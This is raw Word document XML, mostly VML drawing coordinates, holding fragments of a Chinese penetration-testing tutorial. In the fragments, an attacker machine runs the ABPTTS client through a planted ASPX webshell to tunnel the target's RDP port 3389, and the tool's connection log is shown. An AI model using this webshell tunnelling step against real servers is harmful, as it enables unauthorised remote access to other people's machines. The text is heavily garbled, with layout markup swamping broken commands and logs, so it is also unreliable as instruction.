9395,14656,9398,14656,9401,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14657,9404,14658,9404,14658,9404,14658,9404,14658,9404,14658,9404,14659,9404,14659,9404,14659,9404,14660,9404,14660,9404,14660,9404,14661,9404,14661,9404,14662,9404,14662,9404,14663,9404,14663,9404,14664,9404,14665,9404,14665,9404,14666,9404,14667,9404,14668,9404,14668,9404,14669,9404,14670,9404,14671,9404,14672,9404,14673,9404,14674,9404,14675,9404,14676,9404,14678,9404,14679,9404,14680,9404,14682,9404,14683,9404,14684,9404,14686,9404,14687,9404,14689,9404,14691,9404,14692,9404,14694,9404,14696,9404,14698,9404,14700,9404,14702,9404,14704,9404,14706,9404,14708,9404,14711,9404,14713,9404,14715,9404,14718,9404,14720,9404,14723,9404,14726,9404,14728,9404,14731,9404,14734,9404,14737,9404,14740,9404,14743,9404,14746,9404,14749,9404,14753,9404,14756,9404,14760,9404,14763,9404,14767,9404,14770,9404,14774,9404,14778,9404,14782,9404,14786,9404,14790,9404,14795,9404,14799,9404,14803,9404,14808,9404,14812,9404,14817,9404,14822,9404,14827,9404,14832,9404,14837,9404,14842,9404,14847,9404,14852,9404,14858,9404,14863,9404,14869,9404,14875,9404,14881,9404,14887,9404,14893,9404,14899,9404,14905,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9403,14912,9402,14912,9402,14912,9402,14912,9402,14912,9402,14912,9402,14912,9401,14912,9401,14912,9401,14912,9401,14912,9400,14912,9400,14912,9400,14912,9400,14912,9399,14912,9399,14912,9398,14912,9398,14912,9398,14912,9397,14912,9397,14912,9396,14912,9396,14912,9395,14912,9395,14912,9394,14912,9394,14912,9393,14912,9393,14912,9392,14912,9391,14912,9391,14912,9390,14912,9389,14912,9388,14912,9388,14912,9387,14912,9386,14912,9385,14912,9384,14912,9383,14912,9382,14912,9381,14912,9380,14912,9379,14912,9378,14912,9377,14912,9376,14912,9375,14912,9374,14912,9372,14912,9371,14912,9370,14912,9369,14912,9367,14912,9366,14912,9364,14912,9363,14912,9362,14912,9360,14912,9358,14912,9357,14912,9355,14912,9354,14912,9352,14912,9350,14912,9348,14912,9346,14912,9345,14912,9343,14912,9341,14912,9339,14912,9337,14912,9335,14912,9332,14912,9330,14912,9328,14912,9326,14912,9324,14912,9321,14912,9319,14912,9316,14912,9314,14912,9311,14912,9309,14912,9306,14912,9304,14912,9301,14912,9298,14912,9295,14912,9293,14912,9290,14912,9287,14912,9284,14912,9284,14912,9284,14912,9284,14912,9284,14912,9284,14912,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14911,9284,14910,9284,14910,9284,14910,9284,14910,9284,14910,9284,14909,9284,14909,9284,14909,9284,14909,9284,14908,9284,14908,9284,14907,9284,14907,9284,14907,9284,14906,9284,14906,9284,14905,9284,14904,9284,14904,9284,14903,9284,14903,9284,14902,9284,14901,9284,14900,9284,14899,9284,14899,9284,14898,9284,14897,9284,14896,9284,14895,9284,14894,9284,14893,9284,14891,9284,14890,9284,14889,9284,14888,9284,14886,9284,14885,9284,14883,9284,14882,9284,14880,9284,14879,9284,14877,9284,14875,9284,14874,9284,14872,9284,14870,9284,14868,9284,14866,9284,14864,9284,14862,9284,14860,9284,14857,9284,14855,9284,14853,9284,14850,9284,14848,9284,14845,9284,14842,9284,14840,9284,14837,9284,14834,9284,14831,9284,14828,9284,14825,9284,14822,9284,14819,9284,14815,9284,14812,9284,14808,9284,14805,9284,14801,9284,14797,9284,14794,9284,14790,9284,14786,9284,14782,9284,14778,9284,14773,9284,14769,9284,14765,9284,14760,9284,14756,9284,14751,9284,14746,9284,14741,9284,14736,9284,14731,9284,14726,9284,14721,9284,14715,9284,14710,9284,14704,9284,14699,9284,14693,9284,14687,9284,14681,9284,14675,9284,14669,9284,14663,9284,14656e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:469.500pt;margin-top:731.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9390,14630" coordsize="130,270">
        <v:shape style="position:absolute;left:9390;top:14630;width:130;height:270" coordorigin="9390,14630" coordsize="130,270" path="m9404,14656l9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9404,14656,9405,14656,9405,14656,9405,14656,9405,14656,9405,14656,9405,14656,9405,14656,9406,14656,9406,14656,9406,14656,9406,14656,9407,14656,9407,14656,9407,14656,9407,14656,9408,14656,9408,14656,9408,14656,9409,14656,9409,14656,9409,14656,9410,14656,9410,14656,9411,14656,9411,14656,9412,14656,9412,14656,9413,14656,9413,14656,9414,14656,9414,14656,9415,14656,9416,14656,9416,14656,9417,14656,9418,14656,9418,14656,9419,14656,9420,14656,9421,14656,9422,14656,9422,14656,9423,14656,9424,14656,9425,14656,9426,14656,9427,14656,9428,14656,9429,14656,9430,14656,9431,14656,9433,14656,9434,14656,9435,14656,9436,14656,9438,14656,9439,14656,9440,14656,9442,14656,9443,14656,9444,14656,9446,14656,9447,14656,9449,14656,9451,14656,9452,14656,9454,14656,9456,14656,9457,14656,9459,14656,9461,14656,9463,14656,9465,14656,9467,14656,9469,14656,9471,14656,9473,14656,9475,14656,9477,14656,9479,14656,9482,14656,9484,14656,9486,14656,9489,14656,9491,14656,9493,14656,9496,14656,9499,14656,9501,14656,9504,14656,9507,14656,9509,14656,9512,14656,9515,14656,9518,14656,9521,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14656,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14657,9524,14658,9524,14658,9524,14658,9524,14658,9524,14658,9524,14659,9524,14659,9524,14659,9524,14660,9524,14660,9524,14660,9524,14661,9524,14661,9524,14662,9524,14662,9524,14663,9524,14663,9524,14664,9524,14665,9524,14665,9524,14666,9524,14667,9524,14668,9524,14668,9524,14669,9524,14670,9524,14671,9524,14672,9524,14673,9524,14674,9524,14675,9524,14676,9524,14678,9524,14679,9524,14680,9524,14682,9524,14683,9524,14684,9524,14686,9524,14687,9524,14689,9524,14691,9524,14692,9524,14694,9524,14696,9524,14698,9524,14700,9524,14702,9524,14704,9524,14706,9524,14708,9524,14711,9524,14713,9524,14715,9524,14718,9524,14720,9524,14723,9524,14726,9524,14728,9524,14731,9524,14734,9524,14737,9524,14740,9524,14743,9524,14746,9524,14749,9524,14753,9524,14756,9524,14760,9524,14763,9524,14767,9524,14770,9524,14774,9524,14778,9524,14782,9524,14786,9524,14790,9524,14795,9524,14799,9524,14803,9524,14808,9524,14812,9524,14817,9524,14822,9524,14827,9524,14832,9524,14837,9524,14842,9524,14847,9524,14852,9524,14858,9524,14863,9524,14869,9524,14875,9524,14881,9524,14887,9524,14893,9524,14899,9524,14905,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9524,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9523,14912,9522,14912,9522,14912,9522,14912,9522,14912,9522,14912,9521,14912,9521,14912,9521,14912,9521,14912,9520,14912,9520,14912,9520,14912,9520,14912,9519,14912,9519,14912,9519,14912,9518,14912,9518,14912,9517,14912,9517,14912,9516,14912,9516,14912,9515,14912,9515,14912,9514,14912,9514,14912,9513,14912,9513,14912,9512,14912,9511,14912,9511,14912,9510,14912,9509,14912,9508,14912,9508,14912,9507,14912,9506,14912,9505,14912,9504,14912,9503,14912,9502,14912,9501,14912,9500,14912,9499,14912,9498,14912,9497,14912,9496,14912,9495,14912,9494,14912,9493,14912,9491,14912,9490,14912,9489,14912,9487,14912,9486,14912,9485,14912,9483,14912,9482,14912,9480,14912,9478,14912,9477,14912,9475,14912,9474,14912,9472,14912,9470,14912,9468,14912,9466,14912,9465,14912,9463,14912,9461,14912,9459,14912,9457,14912,9455,14912,9453,14912,9450,14912,9448,14912,9446,14912,9444,14912,9441,14912,9439,14912,9437,14912,9434,14912,9432,14912,9429,14912,9426,14912,9424,14912,9421,14912,9418,14912,9415,14912,9413,14912,9410,14912,9407,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14912,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14911,9404,14910,9404,14910,9404,14910,9404,14910,9404,14910,9404,14909,9404,14909,9404,14909,9404,14909,9404,14908,9404,14908,9404,14907,9404,14907,9404,14907,9404,14906,9404,14906,9404,14905,9404,14904,9404,14904,9404,14903,9404,14903,9404,14902,9404,14901,9404,14900,9404,14899,9404,14899,9404,14898,9404,14897,9404,14896,9404,14895,9404,14894,9404,14893,9404,14891,9404,14890,9404,14889,9404,14888,9404,14886,9404,14885,9404,14883,9404,14882,9404,14880,9404,14879,9404,14877,9404,14875,9404,14874,9404,14872,9404,14870,9404,14868,9404,14866,9404,14864,9404,14862,9404,14860,9404,14857,9404,14855,9404,14853,9404,14850,9404,14848,9404,14845,9404,14842,9404,14840,9404,14837,9404,14834,9404,14831,9404,14828,9404,14825,9404,14822,9404,14819,9404,14815,9404,14812,9404,14808,9404,14805,9404,14801,9404,14797,9404,14794,9404,14790,9404,14786,9404,14782,9404,14778,9404,14773,9404,14769,9404,14765,9404,14760,9404,14756,9404,14751,9404,14746,9404,14741,9404,14736,9404,14731,9404,14726,9404,14721,9404,14715,9404,14710,9404,14704,9404,14699,9404,14693,9404,14687,9404,14681,9404,14675,9404,14669,9404,14663,9404,14656e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:193.500pt;margin-top:745.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3870,14910" coordsize="130,270">
        <v:shape style="position:absolute;left:3870;top:14910;width:130;height:270" coordorigin="3870,14910" coordsize="130,270" path="m3881,14927l3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3881,14927,3882,14927,3882,14927,3882,14927,3882,14927,3882,14927,3882,14927,3882,14927,3882,14927,3883,14927,3883,14927,3883,14927,3883,14927,3883,14927,3884,14927,3884,14927,3884,14927,3884,14927,3885,14927,3885,14927,3885,14927,3886,14927,3886,14927,3886,14927,3887,14927,3887,14927,3887,14927,3888,14927,3888,14927,3889,14927,3889,14927,3890,14927,3890,14927,3891,14927,3892,14927,3892,14927,3893,14927,3893,14927,3894,14927,3895,14927,3896,14927,3896,14927,3897,14927,3898,14927,3899,14927,3900,14927,3901,14927,3901,14927,3902,14927,3903,14927,3904,14927,3905,14927,3906,14927,3908,14927,3909,14927,3910,14927,3911,14927,3912,14927,3913,14927,3915,14927,3916,14927,3917,14927,3919,14927,3920,14927,3922,14927,3923,14927,3925,14927,3926,14927,3928,14927,3930,14927,3931,14927,3933,14927,3935,14927,3936,14927,3938,14927,3940,14927,3942,14927,3944,14927,3946,14927,3948,14927,3950,14927,3952,14927,3954,14927,3957,14927,3959,14927,3961,14927,3963,14927,3966,14927,3968,14927,3971,14927,3973,14927,3976,14927,3978,14927,3981,14927,3984,14927,3987,14927,3989,14927,3992,14927,3995,14927,3998,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14928,4001,14928,4001,14928,4001,14928,4001,14928,4001,14929,4001,14929,4001,14929,4001,14930,4001,14930,4001,14930,4001,14931,4001,14931,4001,14931,4001,14932,4001,14932,4001,14933,4001,14934,4001,14934,4001,14935,4001,14936,4001,14936,4001,14937,4001,14938,4001,14939,4001,14939,4001,14940,4001,14941,4001,14942,4001,14943,4001,14944,4001,14945,4001,14947,4001,14948,4001,14949,4001,14950,4001,14952,4001,14953,4001,14955,4001,14956,4001,14958,4001,14959,4001,14961,4001,14963,4001,14964,4001,14966,4001,14968,4001,14970,4001,14972,4001,14974,4001,14976,4001,14978,4001,14981,4001,14983,4001,14985,4001,14988,4001,14990,4001,14993,4001,14996,4001,14998,4001,15001,4001,15004,4001,15007,4001,15010,4001,15013,4001,15016,4001,15019,4001,15023,4001,15026,4001,15030,4001,15033,4001,15037,4001,15041,4001,15044,4001,15048,4001,15052,4001,15056,4001,15060,4001,15065,4001,15069,4001,15073,4001,15078,4001,15083,4001,15087,4001,15092,4001,15097,4001,15102,4001,15107,4001,15112,4001,15117,4001,15123,4001,15128,4001,15134,4001,15139,4001,15145,4001,15151,4001,15157,4001,15163,4001,15169,4001,15175,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4000,15182,4000,15182,4000,15182,4000,15182,4000,15182,4000,15182,4000,15182,4000,15182,3999,15182,3999,15182,3999,15182,3999,15182,3999,15182,3998,15182,3998,15182,3998,15182,3998,15182,3997,15182,3997,15182,3997,15182,3996,15182,3996,15182,3996,15182,3995,15182,3995,15182,3995,15182,3994,15182,3994,15182,3993,15182,3993,15182,3992,15182,3992,15182,3991,15182,3990,15182,3990,15182,3989,15182,3989,15182,3988,15182,3987,15182,3986,15182,3986,15182,3985,15182,3984,15182,3983,15182,3982,15182,3981,15182,3981,15182,3980,15182,3979,15182,3978,15182,3977,15182,3976,15182,3974,15182,3973,15182,3972,15182,3971,15182,3970,15182,3968,15182,3967,15182,3966,15182,3965,15182,3963,15182,3962,15182,3960,15182,3959,15182,3957,15182,3956,15182,3954,15182,3952,15182,3951,15182,3949,15182,3947,15182,3946,15182,3944,15182,3942,15182,3940,15182,3938,15182,3936,15182,3934,15182,3932,15182,3930,15182,3928,15182,3925,15182,3923,15182,3921,15182,3919,15182,3916,15182,3914,15182,3911,15182,3909,15182,3906,15182,3904,15182,3901,15182,3898,15182,3895,15182,3893,15182,3890,15182,3887,15182,3884,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15182,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15181,3881,15180,3881,15180,3881,15180,3881,15180,3881,15180,3881,15179,3881,15179,3881,15179,3881,15178,3881,15178,3881,15178,3881,15177,3881,15177,3881,15176,3881,15176,3881,15175,3881,15175,3881,15174,3881,15173,3881,15173,3881,15172,3881,15171,3881,15170,3881,15170,3881,15169,3881,15168,3881,15167,3881,15166,3881,15165,3881,15164,3881,15163,3881,15162,3881,15160,3881,15159,3881,15158,3881,15156,3881,15155,3881,15154,3881,15152,3881,15151,3881,15149,3881,15147,3881,15146,3881,15144,3881,15142,3881,15140,3881,15138,3881,15136,3881,15134,3881,15132,3881,15130,3881,15127,3881,15125,3881,15123,3881,15120,3881,15118,3881,15115,3881,15113,3881,15110,3881,15107,3881,15104,3881,15101,3881,15098,3881,15095,3881,15092,3881,15089,3881,15085,3881,15082,3881,15078,3881,15075,3881,15071,3881,15068,3881,15064,3881,15060,3881,15056,3881,15052,3881,15048,3881,15043,3881,15039,3881,15035,3881,15030,3881,15026,3881,15021,3881,15016,3881,15011,3881,15006,3881,15001,3881,14996,3881,14991,3881,14986,3881,14980,3881,14975,3881,14969,3881,14963,3881,14957,3881,14951,3881,14945,3881,14939,3881,14933,3881,14927e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:199.500pt;margin-top:745.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3990,14910" coordsize="130,270">
        <v:shape style="position:absolute;left:3990;top:14910;width:130;height:270" coordorigin="3990,14910" coordsize="130,270" path="m4001,14927l4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4001,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4002,14927,4003,14927,4003,14927,4003,14927,4003,14927,4003,14927,4004,14927,4004,14927,4004,14927,4004,14927,4005,14927,4005,14927,4005,14927,4006,14927,4006,14927,4006,14927,4007,14927,4007,14927,4008,14927,4008,14927,4008,14927,4009,14927,4009,14927,4010,14927,4010,14927,4011,14927,4012,14927,4012,14927,4013,14927,4014,14927,4014,14927,4015,14927,4016,14927,4016,14927,4017,14927,4018,14927,4019,14927,4020,14927,4021,14927,4021,14927,4022,14927,4023,14927,4024,14927,4025,14927,4027,14927,4028,14927,4029,14927,4030,14927,4031,14927,4032,14927,4034,14927,4035,14927,4036,14927,4037,14927,4039,14927,4040,14927,4042,14927,4043,14927,4045,14927,4046,14927,4048,14927,4050,14927,4051,14927,4053,14927,4055,14927,4056,14927,4058,14927,4060,14927,4062,14927,4064,14927,4066,14927,4068,14927,4070,14927,4072,14927,4074,14927,4077,14927,4079,14927,4081,14927,4083,14927,4086,14927,4088,14927,4091,14927,4093,14927,4096,14927,4098,14927,4101,14927,4104,14927,4107,14927,4109,14927,4112,14927,4115,14927,4118,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14927,4121,14928,4121,14928,4121,14928,4121,14928,4121,14928,4121,14929,4121,14929,4121,14929,4121,14930,4121,14930,4121,14930,4121,14931,4121,14931,4121,14931,4121,14932,4121,14932,4121,14933,4121,14934,4121,14934,4121,14935,4121,14936,4121,14936,4121,14937,4121,14938,4121,14939,4121,14939,4121,14940,4121,14941,4121,14942,4121,14943,4121,14944,4121,14945,4121,14947,4121,14948,4121,14949,4121,14950,4121,14952,4121,14953,4121,14955,4121,14956,4121,14958,4121,14959,4121,14961,4121,14963,4121,14964,4121,14966,4121,14968,4121,14970,4121,14972,4121,14974,4121,14976,4121,14978,4121,14981,4121,14983,4121,14985,4121,14988,4121,14990,4121,14993,4121,14996,4121,14998,4121,15001,4121,15004,4121,15007,4121,15010,4121,15013,4121,15016,4121,15019,4121,15023,4121,15026,4121,15030,4121,15033,4121,15037,4121,15041,4121,15044,4121,15048,4121,15052,4121,15056,4121,15060,4121,15065,4121,15069,4121,15073,4121,15078,4121,15083,4121,15087,4121,15092,4121,15097,4121,15102,4121,15107,4121,15112,4121,15117,4121,15123,4121,15128,4121,15134,4121,15139,4121,15145,4121,15151,4121,15157,4121,15163,4121,15169,4121,15175,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4121,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4120,15182,4119,15182,4119,15182,4119,15182,4119,15182,4119,15182,4118,15182,4118,15182,4118,15182,4117,15182,4117,15182,4117,15182,4117,15182,4116,15182,4116,15182,4115,15182,4115,15182,4115,15182,4114,15182,4114,15182,4113,15182,4113,15182,4112,15182,4112,15182,4111,15182,4110,15182,4110,15182,4109,15182,4109,15182,4108,15182,4107,15182,4106,15182,4106,15182,4105,15182,4104,15182,4103,15182,4102,15182,4102,15182,4101,15182,4100,15182,4099,15182,4098,15182,4097,15182,4096,15182,4094,15182,4093,15182,4092,15182,4091,15182,4090,15182,4089,15182,4087,15182,4086,15182,4085,15182,4083,15182,4082,15182,4080,15182,4079,15182,4077,15182,4076,15182,4074,15182,4073,15182,4071,15182,4069,15182,4067,15182,4066,15182,4064,15182,4062,15182,4060,15182,4058,15182,4056,15182,4054,15182,4052,15182,4050,15182,4048,15182,4045,15182,4043,15182,4041,15182,4039,15182,4036,15182,4034,15182,4031,15182,4029,15182,4026,15182,4024,15182,4021,15182,4018,15182,4016,15182,4013,15182,4010,15182,4007,15182,4004,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15182,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15181,4001,15180,4001,15180,4001,15180,4001,15180,4001,15180,4001,15179,4001,15179,4001,15179,4001,15178,4001,15178,4001,15178,4001,15177,4001,15177,4001,15176,4001,15176,4001,15175,4001,15175,4001,15174,4001,15173,4001,15173,4001,15172,4001,15171,4001,15170,4001,15170,4001,15169,4001,15168,4001,15167,4001,15166,4001,15165,4001,15164,4001,15163,4001,15162,4001,15160,4001,15159,4001,15158,4001,15156,4001,15155,4001,15154,4001,15152,4001,15151,4001,15149,4001,15147,4001,15146,4001,15144,4001,15142,4001,15140,4001,15138,4001,15136,4001,15134,4001,15132,4001,15130,4001,15127,4001,15125,4001,15123,4001,15120,4001,15118,4001,15115,4001,15113,4001,15110,4001,15107,4001,15104,4001,15101,4001,15098,4001,15095,4001,15092,4001,15089,4001,15085,4001,15082,4001,15078,4001,15075,4001,15071,4001,15068,4001,15064,4001,15060,4001,15056,4001,15052,4001,15048,4001,15043,4001,15039,4001,15035,4001,15030,4001,15026,4001,15021,4001,15016,4001,15011,4001,15006,4001,15001,4001,14996,4001,14991,4001,14986,4001,14980,4001,14975,4001,14969,4001,14963,4001,14957,4001,14951,4001,14945,4001,14939,4001,14933,4001,1492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1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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机执行：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注：如果攻击机为vps，则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de3f29"/>
          <w:spacing w:val="-3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de3f29"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需要填写vps_ip:port/目标机:port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python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abpttsclient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webshell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config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txt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"http://192.168.1.11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9/abptts.aspx"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3389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6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ABPTTS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python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abpttsclient.py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webshell/config.txt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3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"http://192.168.1.119/abptts.aspx"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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐f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192.168.1.5:33389/192.168.1.119:338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-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="99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25.749115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‐‐‐===[[[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Black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Path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Toward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]]]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===‐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‐‐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25.749153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‐‐==[[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]]==‐‐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25.749160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Ben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Lincoln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NCC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Group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25.749169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Version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1.0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2016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07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30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="114" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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25.750372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Listener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ready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forward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fro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m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via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//192.168.1.119/abptt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s.as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px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25.750392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Waiting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.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333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89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28.560180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33389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28.560365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Waiting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.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333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89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28.560655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Connecting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via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.119/abptts.aspx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28.868187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cookie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ASP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NET_SessionId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boyfc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epcijf43s0dhaz5of05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path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HttpOnly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="144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28.868269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S2C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8861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ID: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CEA116F4AF1FAF8C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created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CEA116F4AF1FAF8C</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="107" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263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29.077903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Connection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level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exception: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Errno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onnection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reset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peer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tunnel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8861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3389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736.596pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,14731">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:14731" coordorigin="10402,0" coordsize="0,14731" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,3,10402,4,10402,6,10402,8,10402,11,10402,15,10402,19,10402,23,10402,29,10402,35,10402,42,10402,50,10402,59,10402,69,10402,80,10402,93,10402,106,10402,120,10402,136,10402,153,10402,172,10402,191,10402,213,10402,236,10402,260,10402,286,10402,314,10402,343,10402,374,10402,407,10402,442,10402,479,10402,518,10402,559,10402,602,10402,647,10402,695,10402,744,10402,796,10402,850,10402,907,10402,966,10402,1028,10402,1092,10402,1159,10402,1229,10402,1301,10402,1376,10402,1454,10402,1535,10402,1618,10402,1705,10402,1795,10402,1888,10402,1984,10402,2083,10402,2185,10402,2291,10402,2400,10402,2513,10402,2629,10402,2748,10402,2871,10402,2998,10402,3128,10402,3262,10402,3400,10402,3542,10402,3688,10402,3837,10402,3991,10402,4148,10402,4310,10402,4475,10402,4645,10402,4820,10402,4998,10402,5181,10402,5368,10402,5560,10402,5756,10402,5957,10402,6162,10402,6373,10402,6587,10402,6807,10402,7031,10402,7261,10402,7495,10402,7734,10402,7978,10402,8228,10402,8482,10402,8742,10402,9007,10402,9277,10402,9552,10402,9833,10402,10120,10402,10412,10402,10709,10402,11012,10402,11321,10402,11635,10402,11956,10402,12282,10402,12614,10402,12951,10402,13295,10402,13645,10402,14001,10402,14363,10402,14731e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:650" coordorigin="1490,990" coordsize="8990,65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6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6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46.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2250" coordsize="8990,930">
        <v:shape style="position:absolute;left:1490;top:2250;width:8990;height:930" coordorigin="1490,2250" coordsize="8990,93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6,10484,2276,10484,2276,10484,2276,10484,2276,10484,2277,10484,2277,10484,2277,10484,2278,10484,2278,10484,2279,10484,2279,10484,2280,10484,2281,10484,2282,10484,2283,10484,2284,10484,2285,10484,2286,10484,2287,10484,2288,10484,2290,10484,2291,10484,2293,10484,2295,10484,2296,10484,2298,10484,2300,10484,2303,10484,2305,10484,2307,10484,2310,10484,2313,10484,2315,10484,2318,10484,2321,10484,2325,10484,2328,10484,2332,10484,2335,10484,2339,10484,2343,10484,2347,10484,2352,10484,2356,10484,2361,10484,2366,10484,2371,10484,2376,10484,2381,10484,2387,10484,2392,10484,2398,10484,2405,10484,2411,10484,2418,10484,2424,10484,2431,10484,2439,10484,2446,10484,2454,10484,2461,10484,2470,10484,2478,10484,2486,10484,2495,10484,2504,10484,2514,10484,2523,10484,2533,10484,2543,10484,2553,10484,2564,10484,2575,10484,2586,10484,2597,10484,2609,10484,2621,10484,2633,10484,2645,10484,2658,10484,2671,10484,2685,10484,2698,10484,2712,10484,2726,10484,2741,10484,2756,10484,2771,10484,2786,10484,2802,10484,2818,10484,2835,10484,2852,10484,2869,10484,2886,10484,2904,10484,2922,10484,2941,10484,2959,10484,2979,10484,2998,10484,3018,10484,3038,10484,3059,10484,3080,10484,3101,10484,3123,10484,3145,10484,3168,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10484,3191,10483,3191,10482,3191,10482,3191,10480,3191,10479,3191,10477,3191,10475,3191,10473,3191,10470,3191,10466,3191,10462,3191,10458,3191,10453,3191,10448,3191,10442,3191,10435,3191,10428,3191,10419,3191,10411,3191,10401,3191,10391,3191,10379,3191,10367,3191,10354,3191,10340,3191,10326,3191,10310,3191,10293,3191,10275,3191,10256,3191,10236,3191,10215,3191,10192,3191,10168,3191,1014